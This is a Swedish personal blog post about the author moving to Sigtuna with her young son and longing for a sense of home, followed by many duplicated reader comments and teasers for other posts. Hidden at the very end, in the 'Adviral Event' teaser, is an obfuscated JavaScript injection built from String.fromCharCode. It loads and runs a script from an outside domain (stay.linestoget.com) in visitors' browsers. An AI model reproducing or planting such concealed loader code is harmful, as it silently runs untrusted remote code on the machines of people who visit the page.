Rotlös och rastlös i själen. Redo för en nystart och att hitta ”hem”

image

 

Hej Fina du! 

Jag älskar verkligen hösten! Färgerna, friskheten, ljuset….. OM det inte regnar och är blött & kallt 😉 Jag var lite tveksam till min hårfärg först, eller snarare ovan! Men nu har jag vant mig, jag ÄLSKAR den!

-Tack ni grymma frisörer på Rapunzel i Stockholm <3

Min tok-snygga jacka kommer från FRONTROW visst är den helt underbar!?

Tuff och elegant på samma gång! Tillsammans med slitna  jeans så blir den coolare, än om man har den till ett par svarta filippa k ”kostym” byxor, som jag hade föra veckan. Då blir man mer ”dressad” och elegant.

Jeansen kommer från MIKKAS, du hittar dom HÄR 

IMG_9660

Idag har jag strosat omkring på Sigtunas mysiga gator och gränder.  Andats in lugnet, försökt att bekanta mig med omgivningen. Jag har en bra magkänsla. Jag känner att både jag och Lilleman kommer få lugn och ro här. Vi kommer att trivas. 

-Det ÄR fantastiskt ,mysigt här!

Jag har inte på många år känt mig riktigt ”hemma”.  Jag har under min uppväxt sedan jag bott själv från ca 13-14 års ålder stått på egna ben. Tagit mig igenom tuffa perioder och omänskliga situationer. Blivit stark och formats till den drivna person jag är idag. Jag har flyttat omkring så pass mycket att jag blivit rotlös. Vissa flyttar har jag valt själv, andra inte. Detta har resulterat i att jag känner mig rotlös i själen med en stark längtan efter att få komma hem.

Hem, vad betyder hem för dig? 

Vart är hemma? Vad är hemma? Hur känns det att vara hemma?

-Jag har absolut ingen aning! 

Att få känna mig hemma är en känsla som jag tidigare inte upplevt. Jag har tryggheten i mig själv, inte i hus, prylar eller materiella ting. MEN jag vill verkligen känna den där ”hemma känslan” alla pratar om. Jag är trött på att hela tiden vara påväg någonstans, att försöka fånga upp och jaga den där känslan som jag inte riktigt förstår mig på.

Jag trodde att jag var ”hemma” under alla åren med Lillemans pappa i vårar hus, men någonstans innerst inne så visste jag att jag inte var det. Även om jag gjorde mitt yttersta för att blunda för det. Jag visste att vi inte var menade för varandra och att vi levde på ”lånad tid”

Samma dag allt kom fram och separationen var ett faktum så dog Öland för mig. INTE butiken. Men jag trivdes inte och insåg efter HUNDRA försök att trivas och må bra, att jag inte kommer att klara av att stanna kvar i längden. Det gick inte.

Jag försökte ”köpa mig lyckan” och hemma känslan. Nya bilar, nytt hus, nya möbler etc, etc. Det funkar INTE! Jag trodde jag hittat det ”perfekta” huset för mig och lilleman, mitt ute i skogen, nybyggt, öppen spis, skog och natur runtomkring. Det passade mig perfekt som ville vara ifred.

Men icke! Punkterade  bildäck, ormar i brevlådan, hot och trakasserier, överfallslarm och polisanmälningar. På Lillemans 1 års dag möttes jag av punkterade däck IGEN! plus annat skit, då gick luften ur mig helt! jag minns den dagen som igår, jag var ensam, ledsen och trött efter ett turbulent år. Denna dagen skulle bli perfekt, tårtan skulle hämtas, några vänner skulle komma över och fira Lilleman som fyllde år. Allt blev tvärtom, jag var så trött och ledsen och vågade inte vara kvar ensam i huset efter den dagen. 4 januari 2012. Ett jävla skit år på alla plan! 

Det huset var INTE det perfekta huset. men jag har lagt allt det där och mycket därtill bakom mig. Jag är så glad över min flytt till Sigtuna. Jag är så redo att börja om och få en nystart efter allt skit! Jag känner och hoppas att jag hittat hem. 

Om jag ska vara helt ärlig så känner jag mig som mest hemma hos Maggan & Filip. -Haha! Det är faktiskt sant, under dessa åren har det blivit min ”frizon” min trygghet och min familj  <3 

Det är med lite vemod som jag följer projektet med försäljningen utav deras fantastiska våning i Vasastan. Självklart stöttar jag ju det, även om jag rent egoistiskt vill att dom ska behålla den! 😉

 Nu släpper vi min rastlösa och rotlösa själ och pratar om något annat! 

Imorgon ska jag köra kl 04:30 då jag har öppning i butiken My’s Blommor. Det är JÄTTE mycket nyheter som kommit in i butiken så det ska bli spännande att få se vad tjejerna har hunnit med, och fortsätta att packa upp och exponera fram resten… Det kommer in nyheter löpande under hela hösten =) 

Jag är liiiite stressad över att det är grav-smycknings vecka, och att jag är mitt i flytt. Deadline på krönikor och andra jobb. HUNDRATALS mail att gå igenom, en fb inkorg som är så full att jag snart raderar den! Förberedelser inför jul försäljningen som kryper närmare… osv. Livet snurrar på i 180 😉

Jag gnäller inte, bara konstaterar att jag har häcken full! Allt på samma gång! 

Jag är nervös men samtidigt förväntansfull över att få ta upp Ludvig för första gången nästa vecka. Jag vill att han ska älska sitt nya rum och få den där ”hemma känslan”. Han ska INTE behöva känna så som jag känt  jag kommer viga mitt liv åt att han inte ska behöva gå igenom det jag själv gått igenom och att han ska känna sig trygg och hemma!

Jag sitter just nu och klipper ut familje bilder på mig, vovven och lilleman som jag tänkte göra ett fint kollage utav. Han ska även få besöka sitt nya dagis och träffa sina nya dagis fröknar och vänner.

Jag VET att han kommer älska detta dagis, jag gör det! 

Just nu är Lilleman på semester med sin pappa och deras familj. Jag VET att han har det toppen, men jag längtar ihjäl mig!!!

Så nu åker jag ner till Öland/Kalmar fokuserar 110% på butiken och träningen som jag ligger efter med. Jobbar där nere tills på söndag och kör direkt efter jobbet upp söndag kväll, med ytterligare ett flyttlass. Då har jag hela måndag och tisdag att fixa det sista! Sen vänder jag bilen ner mot Öland/Kalmar igen, jobbar där ons, tors och fredag. Sedan tar jag med mig Lilleman OCH vovven upp över helgen till våran nya bostad!

Ett par veckor till, sedan lugnar det ner sig….. Allt kommer att bli bra. Jag känner det! 

FullSizeRender 10

Oj vilket långt känslosamt inlägg detta blev.

Tänkte bara skrivit några rader om Sigtuna, men plötsligt forsade bara orden ur mig.. Jag behövde nog det.

-Tack för att du är du, glöm inte att du betyder minst lika mycket för mig som jag gör för dig <3 

Kärlek / My Martens 

105 Komentarer

  • om jag har funderat? Ja, jo… genom varje polisförhör, varje gång något nytt hände. Sömnlösa långa nätter med tankar och teorier. Vad tror du själv? Skulle det bara gått obemärkt förbi?

 1. Hej,
  Förstår vad du menar med vikten att hitta hem, men gör du inte din son en stor otjänst genom att han ska ha två förskolor. I slutändan kommer han ju bara ha en skolplats.
  Detta finns att läsa på nätet. Se nedan. Hur ont det än gör, är det inte bättre att vara helgförälder till din son och låta honom ha sin skolgång på en plats?
  Påverkar två förskoleplatser barnet
  Många barnpsykologer hävdar att det inte är bra för barnet med två förskolor. Orsaken till detta är att förskolevistelsen för ett litet barn är en stor händelse med många nya människor och regler att förhålla sig till. Denna nya samvaro är inte lätt att ta in för ett litet barn och än svårare när barnen är riktigt små och inte kan göra sig förstådda. Om det är tufft för det lilla barnet att klara denna utvecklingsprocess på en förskola kan vem som helst förstå att två olika förskoleplatser med olika människor och regler är än mycket mer krävande för ett litet barn. Många sakkunniga uttrycker rädsla över att två olika förskolor kan skapa otrygghet hos barn som kan ge konsekvenser för resten av deras liv. Försök att som förälder samarbeta på ett bra så sätt så att ni bara i en absolut sista utväg väljer att placera barnet på två olika förskolor.

  • Han kommer att ha EN skolplats. Vi löser det internt inom familjen och ser till Ludvigs bästa! Varför tycker DU att det är jag som ska vara en helgförälder till min son? vad grundar du den åsikten på? Vi har MIN familj här uppe, dvs Ludvigs familj också. Jag behöver inte läsa mig till informationen på nätet. Som mamma, behöver jag inte läsa mig till det als. jag går på Ludvigs känslor, mina känslor och den där magkänslan som man som förälder har. Jag VET vad som är bäst för Ludvig! Jag gör honom inte en otjänst, tvärt om! Alla har rätt till sin åsikt, även du! Men detta är inte din ensak, du vet varken bakrund, eller hur relationer ser ut inom familjen! Du behöver absolut INTE oroa dig för Ludvig!

 2. Fina My….
  Jag hoppas du hittat hem o får lugn, ro och trygghet i ditt nya hem. Allt löser sig ”om man slutar jaga”….
  Ett hem är för mig att känna lycka när jag står på trappen, låser upp dörren och går in. Där finns mitt o min mans liv, lugn, ro, trygghet, glädje m.m
  Kram

  • om jag har funderat? Ja, jo… genom varje polisförhör, varje gång något nytt hände. Sömnlösa långa nätter med tankar och teorier. Vad tror du själv? Skulle det bara gått obemärkt förbi?

 3. Hej,
  Förstår vad du menar med vikten att hitta hem, men gör du inte din son en stor otjänst genom att han ska ha två förskolor. I slutändan kommer han ju bara ha en skolplats.
  Detta finns att läsa på nätet. Se nedan. Hur ont det än gör, är det inte bättre att vara helgförälder till din son och låta honom ha sin skolgång på en plats?

  Påverkar två förskoleplatser barnet
  Många barnpsykologer hävdar att det inte är bra för barnet med två förskolor. Orsaken till detta är att förskolevistelsen för ett litet barn är en stor händelse med många nya människor och regler att förhålla sig till. Denna nya samvaro är inte lätt att ta in för ett litet barn och än svårare när barnen är riktigt små och inte kan göra sig förstådda. Om det är tufft för det lilla barnet att klara denna utvecklingsprocess på en förskola kan vem som helst förstå att två olika förskoleplatser med olika människor och regler är än mycket mer krävande för ett litet barn. Många sakkunniga uttrycker rädsla över att två olika förskolor kan skapa otrygghet hos barn som kan ge konsekvenser för resten av deras liv. Försök att som förälder samarbeta på ett bra så sätt så att ni bara i en absolut sista utväg väljer att placera barnet på två olika förskolor.

  • Han kommer att ha EN skolplats. Vi löser det internt inom familjen och ser till Ludvigs bästa! Varför tycker DU att det är jag som ska vara en helgförälder till min son? vad grundar du den åsikten på? Vi har MIN familj här uppe, dvs Ludvigs familj också. Jag behöver inte läsa mig till informationen på nätet. Som mamma, behöver jag inte läsa mig till det als. jag går på Ludvigs känslor, mina känslor och den där magkänslan som man som förälder har. Jag VET vad som är bäst för Ludvig! Jag gör honom inte en otjänst, tvärt om! Alla har rätt till sin åsikt, även du! Men detta är inte din ensak, du vet varken bakrund, eller hur relationer ser ut inom familjen! Du behöver absolut INTE oroa dig för Ludvig!

 4. Fina My….
  Jag hoppas du hittat hem o får lugn, ro och trygghet i ditt nya hem. Allt löser sig ”om man slutar jaga”….
  Ett hem är för mig att känna lycka när jag står på trappen, låser upp dörren och går in. Där finns mitt o min mans liv, lugn, ro, trygghet, glädje m.m
  Kram

 5. Lycka till, kommer gå skitbra med allt! My!
  Fattar inte vad det är med folk, som ska va lite fröken viktig, spelar väl inge roll hur det står på nätet ? Är ju liksom inte så att My kom på igår att imorgon ska jag flytta!
  Du vet som sagt best, My och jag har haft en bekant, där barnen pendlat mellan Sthlm och Umeå, funkade finfint, hade 2 dagisplatser, är man bara positivt inställda själv så löser det sig även för barnen, dom känner sig trygga om föräldrarna/ föräldern! Gör det! så enkelt är det! Hoppas du kommer känna dig hemma i Sigtuna. Kram trevlig Torsdag.

 6. Hej..Mår du bra mår din lille pojk bra .Tycker att han är en lyckans skit som har två familjer som älskar honom och vill hans bästa ..det är inte alla som har i dagens samhälle .Men snälla du ..ta det liiite lugnare så du inte bränner ut dig .Och varför inte unna dig och lilleman lite semester när ni kommit på plats och kör lite hemmamys och gör lite roliga saker tillsammans och landa lite .
  Gå på din magkänsla så blir allt kanonbra .

 7. Hej My! Jag önskar dig varmt lycka till i Sigtuna. Att hitta en hemmakänsla handlar mest om ro för mig . En plats där pulsen går ner, där jag är trygg och vill vara. Det tog tid för mig att hitta mitt hemma även om jag bott på samma ställe länge . Nu har jag den känslan och är så glad för det. Jag önskar att du snart känner den känslan också . Det är du värd. Jag förvånas över alla som verkar veta hur du ska leva ditt liv bäst . Det vet ju. bara du. Jag hejar på dig! Kram Erika

 8. Vilket öppet och fint inlägg även om det såklart är mkt tungt och jobbigt, som ligger bakom…
  Jag kan känna igen mig i att inte känna mig hemma.. inte så som du beskriver direkt men jag o min man har bott i samma hus i 19 år, nu såhär efteråt förstår jag att jag inte trivdes där..Vi flyttade nämligen förra sommaren till ett ljuvligt ställe lite utanför stan med egen sjötomt och strand…
  Inte helt självklart vi har letat annat boende länge men de har inte känns så där bra i magkänslan, nu gjorde iof detta inte direkt de för mig men för min man..Åh idag är jag sååå glad, lycklig över att vi gjorde det – för det är det BÄSTA vi nånsinn gjort.. Nu känner jag mig hemma och även hemma i mig själv..
  Vi har rest en del, och varje semester var det packat för avfärd i stort sett samtidigt som vi kom hem efter jobbet o hade just fått semester, förstår idag att de va en flykt på något vis…
  Lite krav på hur man skulle vara och inte..Här lever vi fullt ut och bara är oss själva, har fått fantastiska grannar …Som sagt hemma kan nog vara på många sätt o kännas olika från person till person…
  Jag känner mig hemma och det känns otroligt skönt är 45 +…..
  Jag hoppas det kommer bli så för dig med, det är alla männsikor värda och jag hoppas o tror även din son kommer trivas, för trivs du så trivs han…
  Önskar dig stort lycka till – du kommer hem snart…kramar

 9. Jisses vad du varit med om. Inte kul för sonen heller om mamma mår dåligt pga såna här tokigheter! Hoppas innerligt att du kan få ro i själen och det kommer bli bra!

 10. Lycka till, kommer gå skitbra med allt! My!
  Fattar inte vad det är med folk, som ska va lite fröken viktig, spelar väl inge roll hur det står på nätet ? Är ju liksom inte så att My kom på igår att imorgon ska jag flytta!

  Du vet som sagt best, My och jag har haft en bekant, där barnen pendlat mellan Sthlm och Umeå, funkade finfint, hade 2 dagisplatser, är man bara positivt inställda själv så löser det sig även för barnen, dom känner sig trygga om föräldrarna/ föräldern! Gör det! så enkelt är det! Hoppas du kommer känna dig hemma i Sigtuna. Kram trevlig Torsdag.

 11. Hej..Mår du bra mår din lille pojk bra .Tycker att han är en lyckans skit som har två familjer som älskar honom och vill hans bästa ..det är inte alla som har i dagens samhälle .Men snälla du ..ta det liiite lugnare så du inte bränner ut dig .Och varför inte unna dig och lilleman lite semester när ni kommit på plats och kör lite hemmamys och gör lite roliga saker tillsammans och landa lite .
  Gå på din magkänsla så blir allt kanonbra .

 12. Hej My! Jag önskar dig varmt lycka till i Sigtuna. Att hitta en hemmakänsla handlar mest om ro för mig . En plats där pulsen går ner, där jag är trygg och vill vara. Det tog tid för mig att hitta mitt hemma även om jag bott på samma ställe länge . Nu har jag den känslan och är så glad för det. Jag önskar att du snart känner den känslan också . Det är du värd. Jag förvånas över alla som verkar veta hur du ska leva ditt liv bäst . Det vet ju. bara du. Jag hejar på dig! Kram Erika

 13. Vilket öppet och fint inlägg även om det såklart är mkt tungt och jobbigt, som ligger bakom…

  Jag kan känna igen mig i att inte känna mig hemma.. inte så som du beskriver direkt men jag o min man har bott i samma hus i 19 år, nu såhär efteråt förstår jag att jag inte trivdes där..Vi flyttade nämligen förra sommaren till ett ljuvligt ställe lite utanför stan med egen sjötomt och strand…
  Inte helt självklart vi har letat annat boende länge men de har inte känns så där bra i magkänslan, nu gjorde iof detta inte direkt de för mig men för min man..Åh idag är jag sååå glad, lycklig över att vi gjorde det – för det är det BÄSTA vi nånsinn gjort.. Nu känner jag mig hemma och även hemma i mig själv..

  Vi har rest en del, och varje semester var det packat för avfärd i stort sett samtidigt som vi kom hem efter jobbet o hade just fått semester, förstår idag att de va en flykt på något vis…
  Lite krav på hur man skulle vara och inte..Här lever vi fullt ut och bara är oss själva, har fått fantastiska grannar …Som sagt hemma kan nog vara på många sätt o kännas olika från person till person…
  Jag känner mig hemma och det känns otroligt skönt är 45 +…..

  Jag hoppas det kommer bli så för dig med, det är alla männsikor värda och jag hoppas o tror även din son kommer trivas, för trivs du så trivs han…

  Önskar dig stort lycka till – du kommer hem snart…kramar

 14. Tyvärr känner jag igen mig i detta. Jag blir lite glad, men inte glad för att du haft det jobbigt utan för att jag faktiskt känner igen mig. Den konstanta känslan av att aldrig tillhöra och att jag faktiskt idag har en familj men ändå känner mig sådär.
  Mina vänner är min trygghet, även om föräldrar är något helt annat. Det förstår man helt plötsligt när man själv är förälder.
  Jag önskar dig all lycka med allt du tar för dig My! Du är stark och du strålar… <3

 15. Jisses vad du varit med om. Inte kul för sonen heller om mamma mår dåligt pga såna här tokigheter! Hoppas innerligt att du kan få ro i själen och det kommer bli bra!

 16. Tyvärr känner jag igen mig i detta. Jag blir lite glad, men inte glad för att du haft det jobbigt utan för att jag faktiskt känner igen mig. Den konstanta känslan av att aldrig tillhöra och att jag faktiskt idag har en familj men ändå känner mig sådär.
  Mina vänner är min trygghet, även om föräldrar är något helt annat. Det förstår man helt plötsligt när man själv är förälder.

  Jag önskar dig all lycka med allt du tar för dig My! Du är stark och du strålar… <3

 17. Så underbart att du har så skön känsla över flytten – det ÄR ett stort steg. Ett bra och modigt steg tycker jag! Ludvig har verkligen en modig och fin mamma med sunda värderingar <3 kram och alla lycka!

 18. Så underbart att du har så skön känsla över flytten – det ÄR ett stort steg. Ett bra och modigt steg tycker jag! Ludvig har verkligen en modig och fin mamma med sunda värderingar <3 kram och alla lycka!

 19. Vet att du kanske inte bryr dig om vad jag säger och det behöver du inte heller göra.
  Men alltså i den åldern som ditt barn är i så skiter han högaktingsfullt i om han går på lekis varje eller varannan vecka och också var. Kör bara på.
  Det är helt upp till er som föräldrar. Mår ni bra så mår han bra.
  I en perfekt värld så är alla barn typ prinsessan Leonora…men nu är det ju inte så…
  Allt gott från Göteborg

 20. Vet att du kanske inte bryr dig om vad jag säger och det behöver du inte heller göra.

  Men alltså i den åldern som ditt barn är i så skiter han högaktingsfullt i om han går på lekis varje eller varannan vecka och också var. Kör bara på.

  Det är helt upp till er som föräldrar. Mår ni bra så mår han bra.

  I en perfekt värld så är alla barn typ prinsessan Leonora…men nu är det ju inte så…

  Allt gott från Göteborg

 21. Fint inlägg! Jag är säker på att du kommer att trivas i din nya omgivning med dina fina kompisar runt omkring dig. Trivs du så kommer din söta Lillleman automatiskt att trivas! Tror inte du behöver vara orolig för det.
  Vad skall du ha för färger i ditt hem då. Du har aldrig skrivit som jag läst vad du gillar för inredning och vad du tycker om för färger om du själv får välja fritt ur hjärtat? Hade varit roligt att veta!
  Stressa nu inte ihjäl dig. Rom byggdes inte på en dag!
  Kram
  Berith

 22. Fint inlägg! Jag är säker på att du kommer att trivas i din nya omgivning med dina fina kompisar runt omkring dig. Trivs du så kommer din söta Lillleman automatiskt att trivas! Tror inte du behöver vara orolig för det.
  Vad skall du ha för färger i ditt hem då. Du har aldrig skrivit som jag läst vad du gillar för inredning och vad du tycker om för färger om du själv får välja fritt ur hjärtat? Hade varit roligt att veta!
  Stressa nu inte ihjäl dig. Rom byggdes inte på en dag!
  Kram
  Berith

 23. Jag vet inte heller riktigt vad hemma är. Men jag vet däremot vad som ger mig positiv energi. Har fått acceptera min rastlösa själ och göra vad jag kan för att den ska må bra… Skogen räddar mig. Mitt hem är skogen. Där kan jag tagga ner och hitta ro..

 24. Jag vet inte heller riktigt vad hemma är. Men jag vet däremot vad som ger mig positiv energi. Har fått acceptera min rastlösa själ och göra vad jag kan för att den ska må bra… Skogen räddar mig. Mitt hem är skogen. Där kan jag tagga ner och hitta ro..

 25. Jag är nästan gammal nog att vara din mamma, om jag var det skulle jag vara så otroligt stolt över allt du gör och hur du hanterar dina livs situationer. Hoppas du kommer finna ro i Sigtuna och nu går jag och hoppas att din ”syster” oxå flyttar ditt så du får ha din ”familj” i närheten. Önskar dej all lycka, som någon annan se till att du vilar oxå så du inte bränner ut dej. Kramar

  • Tack snälla du <3 jag är trött, men lyssnar på kroppen… Några veckors flytt till, sen är det Thailand och teöningsresan.. Även om det är ett jobb så får man sol & värme ? kram

 26. Jag är nästan gammal nog att vara din mamma, om jag var det skulle jag vara så otroligt stolt över allt du gör och hur du hanterar dina livs situationer. Hoppas du kommer finna ro i Sigtuna och nu går jag och hoppas att din ”syster” oxå flyttar ditt så du får ha din ”familj” i närheten. Önskar dej all lycka, som någon annan se till att du vilar oxå så du inte bränner ut dej. Kramar

  • Tack snälla du <3 jag är trött, men lyssnar på kroppen… Några veckors flytt till, sen är det Thailand och teöningsresan.. Även om det är ett jobb så får man sol & värme 🙂 kram

 27. Hej My!
  Vill bara önska lycka till med flytten och allt. Minns när jag träffade dig för att skriva om Mys blommor långt innan allt med Ensam mamma söker. Hur hårt du verkade jobba med butiken, resor till Holland osv. Jag kommer också ihåg att du stack ut, på ett positivt sätt. Jag hoppas verkligen att allt ditt kämpande nu ger resultat och att du får hitta hem på riktigt.

 28. Hej My!

  Vill bara önska lycka till med flytten och allt. Minns när jag träffade dig för att skriva om Mys blommor långt innan allt med Ensam mamma söker. Hur hårt du verkade jobba med butiken, resor till Holland osv. Jag kommer också ihåg att du stack ut, på ett positivt sätt. Jag hoppas verkligen att allt ditt kämpande nu ger resultat och att du får hitta hem på riktigt.

 29. Så vacker och sund du är! Hemma är verkligen där man har sitt hjärta. Tycker du skriver så fint om din vän Maggan. Man förstår verkligen vad hon betyder för dig. Och du för henne förstås! Det är också som att komma hem när man träffar sina närmaste (som om det är förutbestämt vilka man ”fastnar” för). Många kramar till dig!

 30. Så vacker och sund du är! Hemma är verkligen där man har sitt hjärta. Tycker du skriver så fint om din vän Maggan. Man förstår verkligen vad hon betyder för dig. Och du för henne förstås! Det är också som att komma hem när man träffar sina närmaste (som om det är förutbestämt vilka man ”fastnar” för). Många kramar till dig!

 31. Välkommen till Sigtuna!
  Tror att du kommer trivas alldeles utmärkt här ute, flyttade själv ut hit i våras efter en fruktansvärt jobbig separation. Kunde inte hamnat på en bättre plats. Så himla fint. Är inget stort fan av hösten annars men i år tycker jag tillomed att den är vacker. Sett dig några gånger när jag traskat ner till jobbet (jobbar nere på ”stan”) nästa gång får jag väl säga hej kanske ?

 32. Välkommen till Sigtuna!

  Tror att du kommer trivas alldeles utmärkt här ute, flyttade själv ut hit i våras efter en fruktansvärt jobbig separation. Kunde inte hamnat på en bättre plats. Så himla fint. Är inget stort fan av hösten annars men i år tycker jag tillomed att den är vacker. Sett dig några gånger när jag traskat ner till jobbet (jobbar nere på ”stan”) nästa gång får jag väl säga hej kanske 🙂

 33. Åh fina My! Jag känner dig inte, för man kan inte säga att man känner någon efter att ha läst en blogg, men jag känner med dig. Livet blir inte alltid som vi tänkt oss och att känna sig rotlös är nog en av de värsta känslorna en människa kan ha. Jag hoppas att du finner den där hemmakänslan i Sigtuna och att du slipper negativ stress.
  För mig är hemma där min familj är, hemma är inget materiellt utan känslomässigt. Att du skriver att du trivs bäst hos Maggan och Filip är nog just för att du trivs bäst med dem, och inte just i deras våning ?
  Ha en fin vecka! Kram

 34. Åh fina My! Jag känner dig inte, för man kan inte säga att man känner någon efter att ha läst en blogg, men jag känner med dig. Livet blir inte alltid som vi tänkt oss och att känna sig rotlös är nog en av de värsta känslorna en människa kan ha. Jag hoppas att du finner den där hemmakänslan i Sigtuna och att du slipper negativ stress.

  För mig är hemma där min familj är, hemma är inget materiellt utan känslomässigt. Att du skriver att du trivs bäst hos Maggan och Filip är nog just för att du trivs bäst med dem, och inte just i deras våning 🙂
  Ha en fin vecka! Kram

 35. Åh, det kommer att gå jättebra! Ni kommer att få det fint och ni kommer att må bra du och lilla mannen din!
  Tycker att dina val är helt sunda!
  Alltså den där hemma känslan du berättar om .. Jag kan förstå vad du menar! Tänker ofta på det! Söker också efter den fortfarande( i Bålsta inte långt från Sigtuna ? förresten) , ger aldrig upp för jag tror jag hittar den snart.
  Hoppas att du nu finner den i vackra Sigtuna.. Kram på er !

 36. Åh, det kommer att gå jättebra! Ni kommer att få det fint och ni kommer att må bra du och lilla mannen din!
  Tycker att dina val är helt sunda!
  Alltså den där hemma känslan du berättar om .. Jag kan förstå vad du menar! Tänker ofta på det! Söker också efter den fortfarande( i Bålsta inte långt från Sigtuna 🙂 förresten) , ger aldrig upp för jag tror jag hittar den snart.
  Hoppas att du nu finner den i vackra Sigtuna.. Kram på er !

 37. Jag förväntar mig inte få ett svar men jag måste ändå skriva till dig angående den rotlösa själ du innerst inne är. Din text beskrev mig till 100%. I 10 års tid har jag flyttat runt i hopp om att äntligen få känna ”här hör jag hemma” men har aldrig hittat det. Jag har bott lite varstans och ibland känt att ”yes, nu känns det som om jag har hittat hem” för att sedan få den känslan att försvinna.
  Ibland funderar jag på om jag skaffar ett hus eller en bil kommer få mig att känna mig hemma men precis som i ditt inlägg så kommer det inte göra någon skillnad. Jag är 31 år och vill slå mig ner på riktigt men denna impulsiva själ som jag är och både rastlösa och rotlösa människa letar fortfarande. Det är jobbigt att börja om på en ny ort hela tiden, så hur hittar man sitt hem? Tänk om man inte vore så komplicerad… tänk om man bara kunde vara som alla andra.

 38. Jag förväntar mig inte få ett svar men jag måste ändå skriva till dig angående den rotlösa själ du innerst inne är. Din text beskrev mig till 100%. I 10 års tid har jag flyttat runt i hopp om att äntligen få känna ”här hör jag hemma” men har aldrig hittat det. Jag har bott lite varstans och ibland känt att ”yes, nu känns det som om jag har hittat hem” för att sedan få den känslan att försvinna.

  Ibland funderar jag på om jag skaffar ett hus eller en bil kommer få mig att känna mig hemma men precis som i ditt inlägg så kommer det inte göra någon skillnad. Jag är 31 år och vill slå mig ner på riktigt men denna impulsiva själ som jag är och både rastlösa och rotlösa människa letar fortfarande. Det är jobbigt att börja om på en ny ort hela tiden, så hur hittar man sitt hem? Tänk om man inte vore så komplicerad… tänk om man bara kunde vara som alla andra.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/